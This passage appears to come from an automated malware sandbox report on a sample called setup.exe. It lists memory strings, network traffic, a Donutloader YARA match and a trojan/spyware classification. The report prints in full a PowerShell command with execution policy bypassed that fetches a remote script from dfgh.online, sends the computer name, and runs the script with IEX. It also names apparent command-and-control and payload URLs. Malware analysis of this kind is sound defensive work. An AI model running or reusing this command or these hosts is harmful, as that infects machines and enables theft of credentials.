              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: setup.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: setup.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: setup.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: setup.exeString found in binary or memory: http://s2.symcb.com0
              Source: powershell.exe, 0000000A.00000002.1515220136.0000000004ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: setup.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: setup.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: setup.exeString found in binary or memory: http://sf.symcd.com0&
              Source: setup.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: setup.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: setup.exeString found in binary or memory: http://sv.symcd.com0&
              Source: setup.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: setup.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: setup.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: setup.exeString found in binary or memory: http://www.innosetup.com/
              Source: setup.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: setup.exeString found in binary or memory: http://www.remobjects.com/psU
              Source: setup.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: setup.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: setup.exe, 00000000.00000003.1401228925.0000000003E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 0000000A.00000002.1515220136.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1515220136.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt?
              Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: setup.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: setup.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: powershell.exe, 0000000A.00000002.1515220136.0000000005380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 0000000A.00000002.1515220136.00000000051A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=hZ
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/
              Source: setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/:z
              Source: setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/Cert
              Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/XBWQPea
              Source: setup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417494024.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/api
              Source: setup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/apiers
              Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400809409.0000000003E6C000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1400573113.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/hortp
              Source: setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/let_
              Source: setup.exe, 00000000.00000002.1508503088.0000000000819000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/pi
              Source: setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/u
              Source: setup.exe, 00000000.00000003.1417396097.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou/w
              Source: setup.exeString found in binary or memory: https://fairiespar.cyou:443/api
              Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou:443/apiocal
              Source: setup.exe, 00000000.00000003.1417974487.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413835147.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1429890611.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1494951035.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413619922.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1418330853.0000000003E6D000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1413958336.0000000003E6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fairiespar.cyou:443/apiws
              Source: setup.exe, setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/)
              Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/c&
              Source: setup.exe, 00000000.00000002.1508611151.0000000000867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: setup.exe, 00000000.00000003.1507348456.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.1508941560.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtIe
              Source: setup.exeString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txt
              Source: setup.exe, 00000000.00000002.1509921453.0000000003E6A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507711992.0000000003E69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop:443/int_clp_sha.txtg0lh
              Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: setup.exe, 00000000.00000003.1377276625.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377358471.0000000003EAD000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377216849.0000000003EAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: setup.exe, 00000000.00000003.1402013171.00000000040CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49772 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49779 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.7:49823 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0307136A10_2_0307136A
              Source: setup.exeStatic PE information: invalid certificate
              Source: setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: setup.exe, 00000000.00000003.1353030732.000000000387F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs setup.exe
              Source: setup.exe, 00000000.00000002.1508284214.00000000004AE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs setup.exe
              Source: setup.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs setup.exe
              Source: setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@3/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cip1fhdl.bla.ps1Jump to behavior
              Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: setup.exe, 00000000.00000003.1377759445.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1389286858.0000000003F06000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1377466459.0000000003E9A000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1389286858.0000000003E83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: setup.exeReversingLabs: Detection: 15%
              Source: setup.exeString found in binary or memory: /LoadInf=
              Source: setup.exeString found in binary or memory: /LoadInf=
              Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -Jump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
